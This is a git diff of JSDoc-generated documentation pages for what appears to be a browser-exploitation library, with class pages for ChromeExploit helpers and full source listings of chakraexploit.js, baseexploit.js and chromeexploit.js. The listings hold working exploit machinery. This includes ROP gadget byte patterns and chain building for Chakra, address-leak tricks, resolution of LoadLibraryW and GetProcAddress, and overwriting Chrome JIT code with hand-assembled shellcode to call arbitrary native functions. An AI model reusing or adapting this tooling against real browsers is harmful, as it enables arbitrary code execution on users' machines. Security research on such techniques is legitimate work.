+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
base + + +Type + + + + type
address + + +Integer + + + +
+ + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_PointerType.html b/docs/ChromeExploit_PointerType.html new file mode 100644 index 0000000..5cb7b2c --- /dev/null +++ b/docs/ChromeExploit_PointerType.html @@ -0,0 +1,240 @@ + + + + + PointerType - Documentation + + + + + + + + + + + + + + + + +
+ +

PointerType

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + PointerType +

+ + +
+ +
+
+ + + + + +

new PointerType(base)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a pointer type. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
base + + +Type + + + + Base type
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Type
  • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_StructPointer.html b/docs/ChromeExploit_StructPointer.html new file mode 100644 index 0000000..a284bb3 --- /dev/null +++ b/docs/ChromeExploit_StructPointer.html @@ -0,0 +1,252 @@ + + + + + StructPointer - Documentation + + + + + + + + + + + + + + + + +
+ +

StructPointer

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + StructPointer +

+ + +
+ +
+
+ + + + + +

new StructPointer(base, address)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a pointer to a structure type. Internal. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
base + + +Type + + + + type
address + + +Integer + + + +
+ + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_StructType.html b/docs/ChromeExploit_StructType.html new file mode 100644 index 0000000..42bbea5 --- /dev/null +++ b/docs/ChromeExploit_StructType.html @@ -0,0 +1,283 @@ + + + + + StructType - Documentation + + + + + + + + + + + + + + + + +
+ +

StructType

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + StructType +

+ + +
+ +
+
+ + + + + +

new StructType(fields, alignmentopt)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a structure type. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeAttributesDescription
fields + + +Array + + + + + + + + + + Description of structure's fields
alignment + + +integer + + + + + + <optional>
+ + + + + +
Override default alignment
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Type
  • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_Type.html b/docs/ChromeExploit_Type.html new file mode 100644 index 0000000..49102a6 --- /dev/null +++ b/docs/ChromeExploit_Type.html @@ -0,0 +1,180 @@ + + + + + Type - Documentation + + + + + + + + + + + + + + + + +
+ +

Type

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + Type +

+ + +
+ +
+
+ + + + + +

new Type()

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Type base class. Internal. +
+ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_WString.html b/docs/ChromeExploit_WString.html new file mode 100644 index 0000000..f53c0f8 --- /dev/null +++ b/docs/ChromeExploit_WString.html @@ -0,0 +1,240 @@ + + + + + WString - Documentation + + + + + + + + + + + + + + + + +
+ +

WString

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + WString +

+ + +
+ +
+
+ + + + + +

new WString(s)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a pointer to a UTF-16 string. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
s + + +string + + + + A string to make into a UTF-16 string.
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Pointer
  • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + 
\ No newline at end of file
diff --git a/docs/baseexploit.js.html b/docs/baseexploit.js.html
index c3a9320..6880758 100644
--- a/docs/baseexploit.js.html
+++ b/docs/baseexploit.js.html
@@ -22,7 +22,7 @@
@@ -56,17 +56,23 @@

baseexploit.js

var exploit = this; function cString(s) { - var ss = ''; - for (var i = 0; i < s.length / 2 + 2; i++) { - ss += String.fromCharCode((s.charCodeAt(i*2)|0) + ((s.charCodeAt(i*2+1)|0) << 8)); + var u8 = new Uint8Array(s.length + 1); + for (var i = 0; i < s.length; i++) { + u8[i] = s.charCodeAt(i); } - return wString(ss); + u8[i] = 0; + strings.push(u8); + return exploit.addressOfArrayBuffer(u8.buffer); } function wString(s) { - strings.push(s); - parseInt(s); - return exploit.addressOfString(s); + var u16 = new Uint16Array(s.length + 1); + for (var i = 0; i < s.length; i++) { + u16[i] = s.charCodeAt(i); + } + u16[i] = 0; + strings.push(u16); + return exploit.addressOfArrayBuffer(u16.buffer); } function getProcAddress(library, procName) { @@ -132,6 +138,7 @@

baseexploit.js

} else { target.add(idx).store(value); } + return true; }, }; @@ -614,6 +621,7 @@

baseexploit.js

Object.assign(this, { importFunction, + loadLibrary, Pointer, CString, WString, @@ -686,7 +694,7 @@

baseexploit.js

} } for (var j = 0; j < bytesLength; j++) { - if (bytes[j] != p[i + j]) { + if (bytes[j] >= 0 && bytes[j] != p[i + j]) { break; } } @@ -715,6 +723,9 @@

baseexploit.js

array[i / 4] = x.low; array[i / 4 + 1] = x.high; address.low += 8; + if ((address.low|0) == 0) { + address.high += 1; + } } var byteArray = new Uint8Array(array.buffer); @@ -728,7 +739,7 @@

baseexploit.js

throw 'missing gadget ' + name; } for (var j = 1; j < bytes.length; j++) { - if (byteArray[idx + j] != bytes[j]) { + if (bytes[j] >= 0 && byteArray[idx + j] != bytes[j]) { break; } } @@ -755,7 +766,7 @@

baseexploit.js


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/chakraexploit.js.html b/docs/chakraexploit.js.html
index 5cbd8f3..8a75bf9 100644
--- a/docs/chakraexploit.js.html
+++ b/docs/chakraexploit.js.html
@@ -22,7 +22,7 @@
@@ -111,22 +111,34 @@

chakraexploit.js

['jmpGetProcAddress', [0x48, 0x8B, 0xC1, 0x48, 0x8B, 0x49, 0x08, 0x48, 0x85, 0xC9, 0x74, 0x0B, 0x48, 0x83, 0xC4, 0x28, 0x48, 0xFF, 0x25]], ['nopReturn', [0xC3]], ['popRaxReturn', [0x58, 0xC3]], - ['popRcxReturn', [0x59, 0xC3]], ['popRdxReturn', [0x5A, 0xC3]], ['popRspReturn', [0x5C, 0xC3]], ['popRbpReturn', [0x5D, 0xC3]], - ['popRsiReturn', [0x5E, 0xC3]], ['addRsp58Return', [0x48, 0x83, 0xC4, 0x58, 0xC3]], ['storeRaxAtRdxReturn', [0x48, 0x89, 0x02, 0xC3]], - ['entrySlice', [0x8B, 0xF8, 0x41, 0x83, 0xFC, 0x02]], - ['amd64CallFunction', [0x4C, 0x8B, 0x4E, 0x08, 0x4C, 0x8B, 0x06, 0x48, 0x83, 0xEC, 0x20, 0xFF, 0xD0, 0x48, 0x8B, 0xE5, 0x5D, 0x5F, 0x5E, 0x5B, 0xC3]], - ['linkToBeginningThreadContext', [0x48, 0x8B, 0xC4, 0x4C, 0x89, 0x40, 0x18, 0x48, 0x89, 0x50, 0x10, 0x48, 0x89, 0x48, 0x08, 0x48, 0x83, 0x61]], + ['entrySlice', [0x8B, 0xF8, 0x41, 0x83, -1, 0x02]], + ['amd64CallFunction', [0x4C, 0x8B, 0x4E, 0x08, 0x4C, 0x8B, 0x06, 0x48, 0x83, 0xEC, 0x20, 0xFF]], + ['linkToBeginningThreadContext', [0x48, 0x8B, 0xC4, 0x4C, 0x89, 0x40, 0x18, 0x48, 0x89, 0x50, 0x10, 0x48, 0x89, 0x48, 0x08, 0x48, 0x83, -1, -1, 0x00]], + ['popRcxRdxR8R9Return', [0x48, 0x8B, 0x4C, 0x24, 0x08, 0x48, 0x8B, 0x54, 0x24, 0x10, 0x4C, 0x8B, 0x44, 0x24, 0x18, 0x4C, 0x8B, 0x4C, 0x24, 0x20, 0x48, 0xFF, 0xE0]], + ['addRsp28Return', [0x48, 0x83, 0xC4, 0x28, 0xC3]], ]; this.gadgets = this.findGadgets(this.chakraBase, gadgets); + // amd64CallFunction was changed in 1709, so the offset to after the call is different + // call rax (FF D0) + // call __guard_dispatch_icall_fptr (FF 15 ...) + this.amd64CallFunctionReturnOffset = this.gadgets.amd64CallFunction[12] == 0xD0 ? 
13 : 17; // initialize ThreadContext information - this.threadContextPrev = this.gadgets.linkToBeginningThreadContext[18] / 8; - this.threadContextNext = this.gadgets.linkToBeginningThreadContext[30] / 8; - this.globalListFirst = new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(27).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(23))[0])); + if (this.gadgets.linkToBeginningThreadContext[17] == 0x61) { + this.threadContextPrev = this.gadgets.linkToBeginningThreadContext[18] / 8; + this.threadContextNext = this.gadgets.linkToBeginningThreadContext[30] / 8; + this.globalListFirst = new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(27).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(23))[0])); + } else if (this.gadgets.linkToBeginningThreadContext[17] == 0xA1) { + this.threadContextPrev = this.gadgets.linkToBeginningThreadContext[18] / 8; + this.threadContextNext = this.gadgets.linkToBeginningThreadContext[33] / 8; + this.globalListFirst = new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(30).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(26))[0])); + } else { + throw 'unsupported version'; + } var p = this.globalListFirst[0]; for (var i = 0;; i++) { if ((p[i] & 0xffff) == 0xc000) { @@ -159,13 +171,15 @@

chakraexploit.js

return this.locateArrayPtr[0]; } /** - * Returns the address of a string. Points to the string's bytes. + * Returns the address of ArrayBuffer contents. * - * @param {string} s A Javascript string + * @param {ArrayBuffer} ab ArrayBuffer * @returns {Pointer} */ -ChakraExploit.prototype.addressOfString = function (s) { - return this.Uint64Ptr.cast(this.addressOf(s).add(0x10)).load(); +ChakraExploit.prototype.addressOfArrayBuffer = function (ab) { + var dv = new DataView(ab); + var p = this.Uint64Ptr.cast(this.addressOf(dv)); + return p[7]; } ChakraExploit.prototype.findStackTop = function () { if (this.stackTop === undefined) { @@ -202,7 +216,7 @@

chakraexploit.js

throw 'unable to find entrySlice'; } } - while (!this.Uint64.cast(gadgets.amd64CallFunction).add(13).eq(stk.load())) { + while (!this.Uint64.cast(gadgets.amd64CallFunction).add(this.amd64CallFunctionReturnOffset).eq(stk.load())) { stk = stk.add(1); if (stk.address >= this.stackTop) { throw 'unable to find amd64CallFunction'; @@ -241,7 +255,7 @@

chakraexploit.js

eval('String.prototype.slice').call('', { valueOf: () => { var gadgets = this.gadgets; - var amd64CallFunction = this.Uint64.cast(gadgets.amd64CallFunction).add(13); + var amd64CallFunction = this.Uint64.cast(gadgets.amd64CallFunction).add(this.amd64CallFunctionReturnOffset); var entrySlice = this.Uint64.cast(gadgets.entrySlice); var stackBottom = this.stackTop.sub(0x10000); var stk = this.customInt32Array(stackBottom); @@ -280,34 +294,27 @@

chakraexploit.js

// ROP chain // skip saved rbp, rdi, rsi, rbx i = 4; - // pop r8 and r9 using code in amd64_CallFunction - write64(i32, i, gadgets.popRsiReturn); - i++; - write64(i32, i, stk); - i++; - if (args[2] !== undefined) - write64(i32, 0, args[2]); // r8 - if (args[3] !== undefined) - write64(i32, 1, args[3]); // r9 write64(i32, i, gadgets.popRaxReturn); i++; - write64(i32, i, gadgets.nopReturn); - i++; - write64(i32, i, gadgets.popRbpReturn); + write64(i32, i, gadgets.addRsp28Return); i++; - write64(i32, i, stk.add(i - 2)); + write64(i32, i, gadgets.popRcxRdxR8R9Return); i++; - write64(i32, i, gadgets.amd64CallFunction); + // unused i++; - write64(i32, i, gadgets.popRdxReturn); + if (args[0] !== undefined) + write64(i32, i, args[0]); // rcx i++; if (args[1] !== undefined) - write64(i32, i, args[1]); + write64(i32, i, args[1]); // rdx i++; - write64(i32, i, gadgets.popRcxReturn); + if (args[2] !== undefined) + write64(i32, i, args[2]); // r8 i++; - if (args[0] !== undefined) - write64(i32, i, args[0]); + if (args[3] !== undefined) + write64(i32, i, args[3]); // r9 + i++; + write64(i32, i, gadgets.nopReturn); // fix stack alignment i++; write64(i32, i, address); i++; @@ -373,7 +380,7 @@

chakraexploit.js


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/chakrathreadexploit.js.html b/docs/chakrathreadexploit.js.html
index 3f32ac0..86f1c63 100644
--- a/docs/chakrathreadexploit.js.html
+++ b/docs/chakrathreadexploit.js.html
@@ -22,7 +22,7 @@
@@ -121,7 +121,7 @@

chakrathreadexploit.js


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/chromeexploit.js.html b/docs/chromeexploit.js.html new file mode 100644 index 0000000..b782bae --- /dev/null +++ b/docs/chromeexploit.js.html @@ -0,0 +1,296 @@ + + + + + chromeexploit.js - Documentation + + + + + + + + + + + + + + + + +
+ +

chromeexploit.js

+ + + + + + + +
+
+
import BaseExploit from "baseexploit";
+import Integer from "integer";
+
+/**
+ * Constructs an exploit with sensible defaults for Chrome. Child must call initChrome method once read and write methods are available.
+ *
+ * @augments BaseExploit
+ * @class
+ * @constructor
+ */
+function ChromeExploit() {
+    var exploit = this;
+    BaseExploit.call(this, 64);
+}
+ChromeExploit.prototype = Object.create(BaseExploit.prototype);
+ChromeExploit.prototype.constructor = ChromeExploit;
+/**
+ * Initializes Chrome helpers using memory read and write.
+ *
+ * @param {Integer|Pointer} vtable Any address in the chrome DLL
+ */
+ChromeExploit.prototype.initChrome = function (vtable) {
+    this.chromeBase = this.findModuleBase(vtable);
+
+    /* Create a Function with a large amount of JIT code. */
+    var source = '';
+    for (var i = 0; i < 1000; i++) {
+        source += 'x[' + i + '] += ' + Math.random() + ';\n';
+    }
+    this.jitFunction = new Function('x', source);
+    var arr = new Array(1000).fill(0);
+    for (var i = 0; i < 10000; i++) {
+        this.jitFunction(arr);
+    }
+
+    /* Find g_main_thread_stack_start via code pattern matching. */
+    var gadgets = [
+        ['loadLibraryGetProcAddress', [0x48, 0x8D, 0x0D, -1, -1, -1, -1, 0xFF, 0x15, -1, -1, -1, -1, 0x48, 0x8B, 0xF8, 0x48, 0x85, 0xC0, 0x0F, 0x84, -1, -1, -1, -1, 0x48, 0x8D, 0x15, -1, -1, -1, -1, 0x48, 0x8B, 0xC8, 0xFF, 0x15, -1, -1, -1, -1]],
+        ['mainThreadStack', [0x48, 0x8B, 0x05, -1, -1, -1, -1, 0x48, 0x8D, 0x4C, 0x24, -1, 0x48, 0x2B, 0xC1, 0x48, 0x8D, 0x1D, -1, -1, -1, -1, 0x48, 0x3B, 0x05, -1, -1, -1, -1]],
+    ];
+    this.gadgets = this.findGadgets(this.chromeBase, gadgets);
+    this.mainThreadStackBase = new this.PointerType(this.Uint64Ptr).cast(
+        this.Uint64.cast(this.gadgets.mainThreadStack).add(7).add(
+            this.Int32Ptr.cast(this.gadgets.mainThreadStack.add(3))[0])
+    )[0];
+    this.LoadLibraryW = new this.PointerType(this.Uint64Ptr).cast(
+        this.Uint64.cast(this.gadgets.loadLibraryGetProcAddress).add(13).add(
+            this.Int32Ptr.cast(this.gadgets.loadLibraryGetProcAddress.add(9))[0])
+    )[0];
+    this.GetProcAddress = new this.PointerType(this.Uint64Ptr).cast(
+        this.Uint64.cast(this.gadgets.loadLibraryGetProcAddress).add(41).add(
+            this.Int32Ptr.cast(this.gadgets.loadLibraryGetProcAddress.add(37))[0])
+    )[0];
+}
+/**
+ * Returns the address of a Javascript object.
+ *
+ * @param {*} obj Any Javascript object
+ * @returns {Pointer}
+ */
+ChromeExploit.prototype.addressOf = function (obj) {
+    /* TODO: Implement faster version using a predefined Array. */
+    var arr = [obj];
+    return this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOfSlow(arr))[2].sub(1))[2].sub(1);
+}
+/**
+ * Returns the address of ArrayBuffer contents.
+ *
+ * @param {ArrayBuffer} ab ArrayBuffer
+ * @returns {Pointer}
+ */
+ChromeExploit.prototype.addressOfArrayBuffer = function (ab) {
+    var p = this.Uint64Ptr.cast(this.addressOf(ab));
+    return p[4];
+}
+/**
+ * Returns the address of a Javascript object. Internal.
+ *
+ * @param {*} obj Any Javascript object
+ * @returns {Pointer}
+ */
+ChromeExploit.prototype.addressOfSlow = function (obj) {
+    var address;
+    var canary1 = 0x13371338, canary2 = 0x1339133a, mainThreadStackBase = this.mainThreadStackBase;
+    obj.toString = function() {
+        /* Search stack for canary values. */
+        for (var i = 0; i > -0x1000; i--)
+        {
+            if (mainThreadStackBase[i - 2].high == canary2 && mainThreadStackBase[i - 1].high == canary1)
+            {
+                address = mainThreadStackBase[i].sub(1);
+                break;
+            }
+        }
+        return '';
+    };
+    String.prototype.indexOf.call(obj, canary1, canary2);
+    return address;
+}
+/**
+ * Call a function pointer with the given arguments. Used internally by FunctionPointer.
+ *
+ * @param {Integer} address
+ * @param {...Integer} args
+ * @returns {Integer}
+ */
+ChromeExploit.prototype.call = function (address, ...args) {
+    var self = this;
+    function validObjectAddress(x) {
+        return x.high <= 0x7FFF && (x.low & 7) == 1;
+    }
+    function addRspImm8(p, imm) {
+        p[0] = 0x48;
+        p[1] = 0x83;
+        p[2] = 0xc4;
+        p[3] = imm;
+        return p.add(4);
+    }
+    function callRax(p) {
+        p[0] = 0xff;
+        p[1] = 0xd0;
+        return p.add(2);
+    }
+    function movRaxImm64(p, imm) {
+        p[0] = 0x48;
+        p[1] = 0xb8;
+        self.Uint64Ptr.cast(p.add(2))[0] = imm;
+        return p.add(10);
+    }
+    function movRcxImm64(p, imm) {
+        p[0] = 0x48;
+        p[1] = 0xb9;
+        self.Uint64Ptr.cast(p.add(2))[0] = imm;
+        return p.add(10);
+    }
+    function movRdxImm64(p, imm) {
+        p[0] = 0x48;
+        p[1] = 0xba;
+        self.Uint64Ptr.cast(p.add(2))[0] = imm;
+        return p.add(10);
+    }
+    function movR8Imm64(p, imm) {
+        p[0] = 0x49;
+        p[1] = 0xb8;
+        self.Uint64Ptr.cast(p.add(2))[0] = imm;
+        return p.add(10);
+    }
+    function movR9Imm64(p, imm) {
+        p[0] = 0x49;
+        p[1] = 0xb9;
+        self.Uint64Ptr.cast(p.add(2))[0] = imm;
+        return p.add(10);
+    }
+    function pushRax(p) {
+        p[0] = 0x50;
+        return p.add(1);
+    }
+    function storeRax(p, dst) {
+        p[0] = 0x48;
+        p[1] = 0xa3;
+        self.Uint64Ptr.cast(p.add(2))[0] = dst;
+        return p.add(10);
+    }
+    function prologue(p) {
+        /* push rbp */
+        p[0] = 0x55;
+        p[1] = 0x48;
+        /* mov rbp, rsp */
+        p[2] = 0x89;
+        p[3] = 0xe5;
+        /* and rsp, ~0xf */
+        p[4] = 0x48;
+        p[5] = 0x83;
+        p[6] = 0xe4;
+        p[7] = 0xf0;
+        return p.add(8);
+    }
+    function epilogue(p) {
+        p[0] = 0xc9;
+        p[1] = 0xc3;
+        return p.add(2);
+    }
+    function jmp(p, offset) {
+        p[0] = 0xe9;
+        self.Int32Ptr.cast(p.add(1))[0] = offset;
+        return p.add(5);
+    }
+
+    var codeObject = this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOf(this.jitFunction))[7].sub(1));
+    if (validObjectAddress(codeObject[0]) && validObjectAddress(codeObject[1]) &&
+            validObjectAddress(codeObject[2]) && validObjectAddress(codeObject[3])) {
+        /* In newer versions of Chrome, function object points to the code header. */
+        var jitCode = this.Uint8Ptr.cast(codeObject).add(0x60);
+    } else {
+        /* In older versions of Chrome, function object points to the JIT code. */
+        var jitCode = this.Uint8Ptr.cast(codeObject);
+    }
+    var returnValAddress = this.Uint64Ptr.cast(jitCode.add(0x200));
+
+    /* Keep the stack aligned by pushing an even number of stack arguments. */
+    if (args.length > 4 && (args.length & 1)) {
+        args.push(0);
+    }
+
+    var p = jitCode;
+    /* Jump over code with heap pointers that get used during GC. */
+    p = jmp(p, 0x1000).add(0x1000);
+    /* Overwrite the JIT code with shellcode to load arguments and call function. */
+    p = prologue(p);
+    for (var i = args.length - 1; i >= 0; i--) {
+        if (i == 0) {
+            p = movRcxImm64(p, args[i]);
+        } else if (i == 1) {
+            p = movRdxImm64(p, args[i]);
+        } else if (i == 2) {
+            p = movR8Imm64(p, args[i]);
+        } else if (i == 3) {
+            p = movR9Imm64(p, args[i]);
+        } else {
+            p = movRaxImm64(p, args[i]);
+            p = pushRax(p);
+        }
+    }
+    p = addRspImm8(p, -0x20);
+    p = movRaxImm64(p, address);
+    p = callRax(p);
+    p = addRspImm8(p, 0x20);
+    p = storeRax(p, returnValAddress);
+    p = epilogue(p);
+
+    /* Call the JIT code. */
+    this.jitFunction();
+
+    /* Retrieve the return value. */
+    return returnValAddress[0];
+}
+
+export default ChromeExploit;
+
+
+
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + +
diff --git a/docs/global.html b/docs/global.html
index c8a11c1..127c26c 100644
--- a/docs/global.html
+++ b/docs/global.html
@@ -22,7 +22,7 @@
@@ -192,7 +192,7 @@

Integer
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/global.html#Integer b/docs/global.html#Integer
index 66c042f..a13395f 100644
--- a/docs/global.html#Integer
+++ b/docs/global.html#Integer
@@ -22,7 +22,7 @@
@@ -7933,7 +7933,7 @@
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/index.html b/docs/index.html
index bd3ef69..691d476 100644
--- a/docs/index.html
+++ b/docs/index.html
@@ -22,7 +22,7 @@
@@ -46,9 +46,10 @@

Home

Classes